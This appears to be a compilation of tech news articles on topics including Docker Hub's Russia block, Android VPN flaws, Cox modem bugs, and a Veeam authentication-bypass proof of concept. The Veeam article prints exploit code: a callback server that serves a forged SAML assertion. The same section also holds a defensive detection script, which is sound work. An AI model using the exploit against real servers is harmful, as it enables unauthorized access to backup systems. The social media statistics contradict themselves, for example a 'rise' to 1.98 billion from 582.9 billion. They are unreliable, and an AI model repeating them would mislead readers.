Docker Hub Services No Longer Available In Russia

Shortly after multiple users complained online about the unavailability of Docker Hub services, it’s now official that Docker Hub services have been suspended in Russia. The platform cites US export laws as the reason for withdrawing its services following the Russia-Ukraine war.

Docker Hub Ends Operations In Russia Without Prior Notice

Reportedly, the developer platform Docker has blocked Russian users from accessing it due to US laws. This development came as a shock to many Russian developers who relied on Docker Hub.

Specifically, Docker Hub is the main public registry for the developer platform-as-a-service giant Docker, facilitating the developer community globally. The platform employs a freemium model and has become beneficial for most users as a seamless cloud platform for sharing, storing, and managing container images.

The matter gained traction in the media following multiple complaints from users regarding the inaccessibility of Docker Hub services in Russia. Besides highlighting the matter on social media sites like Reddit, users also shared their concerns on the official Docker forums.

Eventually, Russian media confirmed that Docker blocked its services for Russian users, citing compliance with US export control laws as the reason. Moreover, besides banning Russian users, Docker also restricted users from five other countries: Iran, Cuba, North Korea, Syria, and Sudan.

Users who try to access Docker and hit the restriction see the following message from the platform.

Since Docker is a US company, we must comply with US export control regulations. In an effort to comply with these, we now block all IP addresses that are located in Cuba, Iran, North Korea, Republic of Crimea, Sudan, and Syria. If you are not in one of these cities, countries, or regions and are blocked, please reach out to https://hub.docker.com/support/contact/

Since Docker mentioned blocking IP addresses from these regions, users may still be able to access the platform using a VPN. In fact, VPNs are often used for accessing blocked sites and services globally. Nonetheless, this isn’t a fool-proof strategy due to potential IP/DNS leak issues that may trigger the ban if the platform knows the real IP addresses or if Docker implements measures to detect and block VPN users.


Last year’s top social media platform might surprise you

Do you consider YouTube to be a social media platform? Lifesight.io, a marketing research company, puts YouTube in that category and calls it the top social media platform based on the number of visits. Last year, the streaming video provider hosted 1.35 trillion visits, up 80.49% from the 263.3 billion that came to the platform in 2019. At 67%, the majority of YouTube visitors are male and nearly 70% are viewing YouTube videos on their mobile devices.
One of the now iconic ads that Apple released for the original iPhone in 2007 was all about the YouTube app that was pre-installed on iOS until iOS 6. Apple even took a moment in the advertisement to point out how unusual it was for a phone to have a YouTube app. As the commercial showed a skateboarding bulldog, the voice-over announcer said, “Maybe the biggest surprise is finding YouTube on your phone.”

While YouTube attracted the largest number of visitors to a social media platform in 2023, one of the biggest growth rates in the genre over the five years from 2019-2023 belonged to TikTok. With a growth rate during the five years reaching a stunning 6015%, the controversial social media player saw the number of visits rise from .7 billion in 2019 to 41.8 billion last year. TikTok is a “mobile-centric” site that is just as popular with men as women.

Overall social media visits rose 70.56% worldwide during the five years from 2019 to 2023 as the number of visits rose to 1.98 billion from 582.9 billion. The top three countries to host visitors to social media platforms last year were the U.S. (436.1 billion visitors), India (171.8 billion), and Brazil (123 billion). At 68.65%, most visitors to social media sites were male (leaving 31.35% for females). 59.10% preferred to visit these sites using their mobile devices.

The top ten social media platforms of 2023 include:

  • YouTube: streaming video site hosted a leading 1.35 trillion visitors in 2023.
  • Facebook: with 216.4 billion visitors last year, Facebook had a very modest five year growth rate of 15.33% and lost its spot at number one.
  • X (formerly Twitter): male-dominated platform had 112.9 billion visits last year, up from 41.6 billion in 2019. Over 77% of visitors view X on their mobile devices.
  • Instagram: another mobile-centric platform with a majority of male users, Instagram counted 87.3 billion visits in 2023, a 62.40% increase from 2019.
  • Reddit: yet another male-dominated mobile-centric platform that features community-driven content.
  • TikTok: controversial platform saw the number of visits rise over 60 times between 2019 and 2023.
  • WhatsApp: large number of desktop users as WhatsApp is used for cross-platform communications.
  • LinkedIn: professional networking platform had 20.5 billion visits last year.
  • Twitch: live streaming gaming platform counted 20 billion visitors in 2023, predominantly male and mobile.
  • Quora: 19 billion visits last year as the platform shares knowledge and passes along information.

How many of the top-ten social media sites do you frequently visit?



Free Android VPNs Suffering Encryption Failures, New Report

VPN apps for Android are meant to increase privacy and security over the internet by encrypting connection data so that hackers or other parties cannot access communication data.

They also help unblock region-restricted content by hiding the IP address, support anonymity on the Internet, and protect sensitive information, especially when using insecure Wi-Fi.

Cybersecurity researcher Simon Migliano at Top10VPN recently discovered that free Android VPNs are suffering encryption failures.

Free VPNs Encryption Failures

Prompted by the growing trend of government-imposed internet restrictions worldwide and the resulting demand for virtual private networks (VPNs), this study examines the privacy and security issues of free VPN applications.

Since 2018, the total installations of the 100 most popular free Android VPNs have skyrocketed from 260 million to over 2.5 billion.

This in-depth research evaluated the privacy and security risks associated with the top 100 free Android VPN apps, which have garnered over 2.5 billion total installations due to increasing global demand.

By testing each app on separate devices, using various tools within an isolated environment, the study identified shocking flaws in encryption, data leakage, and privacy-infringing functions in the codes of these apps.

Most importantly, it was discovered that most of them openly shared personal user information directly with firms such as “Yandex” and “Bytedance,” which shows a contradiction between offering a free service and upholding a VPN’s core goal of confidentiality.

For those who cannot afford to pay for VPNs, it is possible to find good, free ones by doing extensive research. However, affordable paid options are more reliable.

The tests revealed worrying encryption flaws and data leakage among all 100 free VPN applications.

11 experienced full-scale breakdowns in the encryption process, slightly over a third deployed an inadequate form of encryption, and few used the best hashing algorithms or TLS 1.3.

In total, 88 apps leaked information, including 83 that disclosed DNS requests and 79 that did not tunnel all traffic. Over half of these applications suffered from connection instability.

The study uncovered these extensive user privacy and security vulnerabilities through Wireshark traffic analysis within a unique test environment.

Those 11 VPNs are:

  • HTTP Injector
  • Phone Guardian VPN
  • VPN Private
  • iTop VPN
  • PotatoVPN
  • Swift VPN
  • Tenta Private VPN Browser
  • Maple VPN
  • GoFly VPN
  • AVG Secure Browser
  • VPN Satoshi

11 apps were found to have no encryption at all, consequently exposing the browsing activities.

Data leaks were widespread: 83 of the apps leaked DNS requests and only 79 could tunnel all traffic.

In addition, many of the investigated apps (96) contained code with potential privacy impacts, and some had first-party location tracking together with permissions.

More worrying were the 12 apps that included third-party precise location tracking code and permissions; some even track in the background.

The main contributors to major privacy concerns included SDKs such as ByteDance, Yandex, and Facebook embedded in popular apps.

In total, during this test period, 71 applications shared personal information while their VPN was still running.


Detour ahead: latest Google Maps beta disrupts Android Auto navigation

The latest beta update to Google Maps is causing some Android Auto users to experience issues with the navigation app. These things are always possible, that’s why it’s a beta version, but this issue seems to be making the entire app crash instead of just glitching.

Several forum reports describe Google Maps crashing in Android Auto. Luckily, the rest of the Android Auto experience works; only launching Google Maps seems to be an issue right now. The app on phones, however, is fully functional.

It seems that Google Maps for Android beta version 11.132.0100 is the culprit. This version was released on June 3. The issue impacts Pixel, Samsung Galaxy, and other Android phones, and we expect Google to issue a patch to fix it shortly.
Some users on the stable version of Google Maps have also reported issues, but the majority of reports come from people on the beta. If you want to leave the beta, you can do so through the Play Store. After that, find App Info, then go to the overflow menu and tap on “Uninstall updates”. Then, return to Google Play and update to the latest stable version.

This bug seems annoying but at the same time, beta versions are still versions in development and I find it understandable that they might not work as expected. After all, that’s a risk all users on beta should be well aware of. Getting to see cool features before they’re officially launched comes with this trade-off, usually.


Cox Modem Vulnerabilities Exposed Modems To Hacking

A researcher discovered numerous security flaws in Cox modems that allowed remote attackers to hack the devices. Exploiting the vulnerabilities could let an adversary take control of a target Cox modem, execute commands, and meddle with the device settings.

Cox Modem Vulnerabilities Allowed Remote Attacks

According to a recent post from the researcher Sam Curry, numerous vulnerabilities impacted the security of Cox modems, allowing remote modem hacking.

As explained, the series of vulnerabilities together led to an authorization bypass issue in the backend API that allowed an adversary to take over target Cox modems. Abusing the exposed APIs could let the adversary access customers’ personal information, such as names, phone numbers, email addresses, and account numbers. Moreover, the APIs also exposed WiFi passwords and hardware MAC addresses of connected devices. That means this particular vulnerability put all connected devices at risk.

Since the vulnerability existed in these modems for years, it made millions of devices vulnerable to security threats.

The researcher further explained that the vulnerabilities resulted in around 700 exposed APIs, some of which could even allow admin access, letting an attacker execute unauthorized commands, modify device settings, and gain ISP-level permissions.

Patch Deployed

Considering that Cox ranks among the top US broadband, telephone cable, and phone carrier services, the proportionately huge number of vulnerable devices indicates the extent of damage in case of malicious exploits.

Thankfully, following the researcher’s report, Cox patched the vulnerabilities within 24 hours, preventing any active attacks. The firm also assured that it had detected no exploitation attempts in the past.

However, an interesting aspect of the researcher’s report is the active hacking attack on his own modem. The unknown adversary kept the researcher’s device compromised for quite some time, remaining undetected all the while. While trying to trace the unknown adversary, the researcher spotted the vulnerabilities and got them patched, but he remained unsuccessful in tracking the attacker(s) on his own device.

Anyhow, now that Cox has deployed the patches, users must ensure that their devices are updated with the latest patches to address the modem vulnerabilities.


Galaxy Z Fold 6 to recycle camera hardware from the Fold 5

It seems like the Galaxy Z Fold 6 will recycle the Galaxy Z Fold 5’s camera hardware. This information comes from Ice Universe, as he claims that the Galaxy Z Fold 6 will have the exact same cameras as its predecessor.

The Galaxy Z Fold 6 will recycle camera hardware, a well-known tipster claims

In his X post, he was very clear when stating that all of the phone’s cameras will be the same. He mentioned rear cameras, a front camera, camera specifications in general, UPC, and aperture value. There will be no change whatsoever.

If that ends up being the case, Samsung really is risking annoying its consumers. If we take into account the Galaxy Z Fold 4, the company has been pushing this camera hardware for far too long.

There are other foldable smartphones in the market that have much better camera hardware at this point. They also offer better camera performance as a result of that, and improved image processing too, of course.

Samsung could end up improving its camera algorithms and whatnot, but there’s only so much the company can do with this camera hardware. Many people have been expecting an improvement in that regard.

The source said that AI will be the main selling point for Samsung’s new foldable

The tipster was asked “what’s the selling point” of the phone then, considering that not much will change, aside from the aspect ratio. He said that Samsung will focus heavily on AI, and will push it as the main selling point.

Let’s hope that the company will change things up with the Galaxy Z Fold 7 next year. The competition is going forward in a number of ways, and it just feels like Samsung is lagging behind.

The company could, of course, bounce back really fast, as it does have the knowledge and resources to do that. It remains to be seen if things will change next year.



Apple is now the home of one of the most popular book clubs

Apple’s e-book reading app has just become the official audiobook home of one of the most popular book clubs, Reese’s Book Club. Founded by iconic American actress and producer Reese Witherspoon, the book club puts women at the center of stories each month.

The partnership between Apple Books and Reese Witherspoon involves a dedicated page for users to follow to be notified about new monthly picks, which will be featured on Apple’s app.

This dedicated page also allows users to browse books from previous months that were spotlighting women, as well as get access to themed editorial collections curated exclusively by Apple and Reese’s Book Club editors.

But wait, there’s more! Apple announced that its Books app will offer exclusive pricing promotions. On top of that, Hello Sunshine authors, another company founded by Reese Witherspoon that aims to empower women, will curate audiobook recommendations, thus helping readers to choose from more stories that will be revealed only on Apple Books.

Starting this week, Apple Books users can find Reese’s Book Club in the app and learn more about the latest selection, including the newly announced pick for June, which is “The Unwedding,” by number 1 New York Times bestselling author Ally Condie.

This is not the first time that Apple and Reese Witherspoon teamed up for a project. Reese’s Hello Sunshine has already produced the Apple TV+ original series The Last Thing He Told Me, which was renewed for season two, and the Critics Choice Award-winning series “The Morning Show,” among other things.


PoC Exploit Released For Veeam Authentication Bypass Vulnerability

A proof-of-concept (PoC) exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

The vulnerability, identified as CVE-2024-29849, has a CVSS score of 9.8, indicating its high severity.

This article delves into the details of the vulnerability, the exploit, and the potential implications for organizations using Veeam’s software. 

On May 21, 2024, Veeam published an advisory regarding CVE-2024-29849, a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

This flaw allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user, effectively bypassing all authentication mechanisms.

The vulnerability resides in the Veeam.Backup.Enterprise.RestAPIService.exe, a REST API server component of the Veeam Backup Enterprise Manager software.

This service listens on TCP port 9398 and serves as an API version of the main web application, which operates on TCP port 9443. 

Technical Analysis of the Exploit

The PoC exploit, developed by Sina Kheirkhah of the Summoning Team, leverages the vulnerability by manipulating the Veeam.Backup.Enterprise.RestAPIService.CEnterpriseRestSessionManagerControllerStub.LogInAfterAuthentication method.

This method is executed when an authentication request is received, and the exploit targets specific checks and conditions within this method to bypass authentication.

The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service.

The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.

The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.

Diagram illustrating the authentication bypass exploit process.

Proof of Concept (PoC) Code

The PoC code for the exploit has been made publicly available, allowing security researchers and potentially malicious actors to understand and replicate the attack.

Below is a snippet of the PoC code:

from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
import warnings
import base64
import requests
from urllib.parse import urlparse
from threading import Thread
import os

warnings.filterwarnings("ignore", category=DeprecationWarning)
requests.packages.urllib3.disable_warnings()

class CustomHandler(SimpleHTTPRequestHandler):
    def do_POST(self):
        # Static SAML assertion returned to whatever POSTs to the callback server
        xml_response = '''<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
                            <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>
                            <saml2:Status>
                                <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>
                            </saml2:Status>
                          </saml2:Assertion>'''
        self.send_response(200)
        self.send_header("Content-type", "text/xml")
        self.end_headers()
        self.wfile.write(xml_response.encode("utf-8"))
        print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType")

def start_callback_server(ip, port):
    # HTTPS listener that answers with the assertion above
    httpd = HTTPServer((ip, port), CustomHandler)
    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ssl_context.load_cert_chain("server.pem", keyfile="key.pem")
    httpd.socket = ssl_context.wrap_socket(httpd.socket, server_side=True)
    print(f"(*) Callback server listening on https://{ip}:{port}")
    httpd.serve_forever()

# Additional code for exploit execution...
Figure 2: Snippet of the PoC exploit code.

Implications and Mitigation

The release of this PoC exploit underscores the critical nature of CVE-2024-29849.

Organizations using Veeam Backup Enterprise Manager are at significant risk if they do not apply the necessary patches and mitigations.

An attacker exploiting this vulnerability could gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.

Veeam has recommended immediate updates to their software’s latest version, including patches to address this vulnerability.

Additionally, organizations should review their security configurations and consider implementing additional layers of security, such as multi-factor authentication (MFA) and network segmentation, to mitigate the risk of exploitation. 
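
The snippet above shows the REST API service (TCP 9398) POSTing to a callback server, so a request to port 9398 from an unexpected client followed shortly by an outbound connection from the Veeam host is a pattern worth hunting for alongside network segmentation. The following Python is an added example, not code from the article, the PoC author or Veeam; the host address, allowlisted networks, 30-second window and flow-log format are assumptions, and the sample records are constructed.

```python
"""Flag the inbound-9398 / outbound-callback pattern in flow records (added example)."""
import csv
import io
import ipaddress
from datetime import datetime, timedelta

REST_API_PORT = 9398  # REST API service port named in the article

# Assumptions for this example: the Enterprise Manager host, the networks
# allowed to reach its API, and the networks it may legitimately connect to.
VEEAM_HOST = ipaddress.ip_address("10.0.5.20")
API_CLIENT_NETS = [ipaddress.ip_network("10.0.9.0/24")]
OUTBOUND_ALLOW = [ipaddress.ip_network("10.0.5.0/24")]
CALLBACK_WINDOW = timedelta(seconds=30)

# Constructed sample flow log: timestamp, src, dst, dst_port. Not real data.
SAMPLE_FLOWS = """\
2024-06-10T09:00:01,10.0.9.15,10.0.5.20,9398
2024-06-10T09:00:02,10.0.5.20,10.0.5.31,443
2024-06-10T09:14:40,10.0.77.8,10.0.5.20,9398
2024-06-10T09:14:41,10.0.5.20,10.0.77.8,443
2024-06-10T09:30:00,10.0.5.20,203.0.113.50,8443
2024-06-10T10:02:10,10.0.77.9,10.0.5.20,9443
"""


def parse_flows(text):
    """Parse CSV flow records into dicts, sorted by timestamp."""
    flows = []
    for row in csv.reader(io.StringIO(text)):
        if not row:
            continue
        ts, src, dst, port = row
        flows.append({
            "ts": datetime.fromisoformat(ts),
            "src": ipaddress.ip_address(src),
            "dst": ipaddress.ip_address(dst),
            "port": int(port),
        })
    return sorted(flows, key=lambda f: f["ts"])


def in_any(ip, nets):
    return any(ip in net for net in nets)


def find_suspicious(flows):
    """Return (kind, peer) findings in time order.

    unexpected_api_client: connection to the REST API port from outside the
                           allowed client networks.
    callback_pattern:      non-allowlisted outbound connection from the Veeam
                           host within CALLBACK_WINDOW of such a request.
    outbound_unlisted:     any other non-allowlisted outbound connection.
    """
    findings = []
    last_unexpected = None  # time of the latest unexpected API request
    for f in flows:
        if f["dst"] == VEEAM_HOST and f["port"] == REST_API_PORT:
            if not in_any(f["src"], API_CLIENT_NETS):
                last_unexpected = f["ts"]
                findings.append(("unexpected_api_client", str(f["src"])))
        elif f["src"] == VEEAM_HOST and not in_any(f["dst"], OUTBOUND_ALLOW):
            recent = (last_unexpected is not None
                      and f["ts"] - last_unexpected <= CALLBACK_WINDOW)
            kind = "callback_pattern" if recent else "outbound_unlisted"
            findings.append((kind, str(f["dst"])))
    return findings


if __name__ == "__main__":
    for kind, peer in find_suspicious(parse_flows(SAMPLE_FLOWS)):
        print(f"{kind}: {peer}")
```

A callback_pattern finding is the one to triage first; the other two kinds also show where segmentation rules around port 9398 and the host's egress are looser than intended.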

The discovery and public release of the PoC exploit for CVE-2024-29849 highlight the ongoing challenges in securing enterprise software.

It reminds organizations to stay vigilant, keep their systems updated, and adopt robust security practices to protect against emerging threats.


iPhone 16 battery leak shows larger capacity & metal casing

Many people complained about the overheating issue of the iPhone 15 series. Apple promised to solve the overheating problem through software updates. However, the issue still persists for many users. The problem could be due to a hardware design of the previous model.

iPhone 16 battery leak shows metal casing & bigger capacity

Now a leak from tipster Majin Bu on X has revealed the battery on the iPhone 16. The image suggests that Apple doesn’t want to make the same mistake with the iPhone 16 series. According to the leak, the battery of the iPhone 16 will equip a metal case outside the soft plastic pouch. The metal casing should help dissipate the heat from the battery. It should be especially helpful when the phone is charging, as this is the scenario where the battery cell heats up the most.

The battery has a similar shape, but the engraving on the metal casing shows “3597mAh”. For context, the iPhone 15 has a smaller 3349 mAh battery.

The leaked images of the iPhone 16 battery show a frosted finish on the case. Apple has also redesigned the connectors. Apple reportedly opted for a glossy surface for the metal casing at first but later on decided to go for a frosted finish.

The use of a hard case for the batteries was first leaked in November by tipster @KosutamiSan. He also claimed that the iPhone 16 series will switch to a graphene thermal system, as it offers excellent thermal conductivity (better than copper).

The latest leak is about the base iPhone 16. However, the tipster @KosutamiSan already shared leaked images of the iPhone 16 Pro battery back in April this year. According to the leak, the battery for the iPhone 16 Pro also has a frosted metal casing and a capacity of 3355mAh. This is around a 2.4% increase as compared to the iPhone 15 Pro.

iPhone 16 could use a different battery technology or it could be heavier

iPhones were becoming heavier and Apple had to find a solution to it. They replaced the stainless steel middle frame of the Pro models with titanium to reduce the weight. As a result, the iPhone 15 Pro became significantly lighter (187g) as compared to its predecessor (206g).

While the iPhone 15 (171g) weighs very similar to its predecessor, the extra metal inside the iPhone 16 may significantly increase the weight. A higher battery capacity will also contribute to the increased weight.

Nonetheless, we can only observe the exterior of the battery pack. Apple might be using a different battery technology with higher energy density, as seen in some book-style foldables.

This is plausible since the metal casing increases the battery’s thickness, which could require a redesign of the internal components or result in a thicker phone.



Best of Computex 2024: MSI X870 Motherboards

MSI’s new motherboards are stronger and easier to assemble than ever before

At Computex this week in Taiwan, MSI introduced the X870 motherboards, which perfectly complement the new AMD Ryzen 9000 lineup of processors. It also includes PCIe Gen 5.0 and M.2 slots, which makes for a great experience in both graphics and storage.

While we don’t yet have pricing or availability for the MSI X870 motherboards, we do know that these will be some of the best motherboards launching this year hence why the MSI X870 Motherboards have earned a Best of Computex 2024 award from Android Headlines.

MSI includes cutting-edge technologies in the new X870 motherboards

As you’d expect from a brand new lineup of motherboards, MSI is supporting the most cutting-edge technologies, including USB 4 connectivity, which will offer speeds of up to 40GB per second. It’s been outfitted with the MAG X870 TOMAHAWK WiFi and PRO X870-P WiFi with cutting-edge 5G LAN, WiFi 7, and Bluetooth 5.4. Basically, it is the latest and greatest tech that will be available in 2024.

When these motherboards become available – likely later this year – it’s definitely going to be the one you want to put in your rig. MSI is also focusing on the ease of assembly with these new motherboards. GPUs getting larger and heavier can be a strain on the motherboard. So MSI is also offering three additional anchor points and using a thicker material for the PCIe slots, which should solve that problem. These are 121% stronger than previous-gen solutions. And the slots are able to withstand twice the weight of the graphics card than before.

Continuing with the ease of assembly theme, MSI has also made it even easier to install an M.2 SSD into your rig with the X870. Just a simple push locks the M.2 SSD into place, and removing it is as simple as a slight pull to the left. It really can’t get any easier than that.

MSI uses cutting-edge technologies and makes installation and upgrades a piece of cake with the X870 motherboards. That’s why we have awarded these new motherboards the Best of Computex 2024 award.

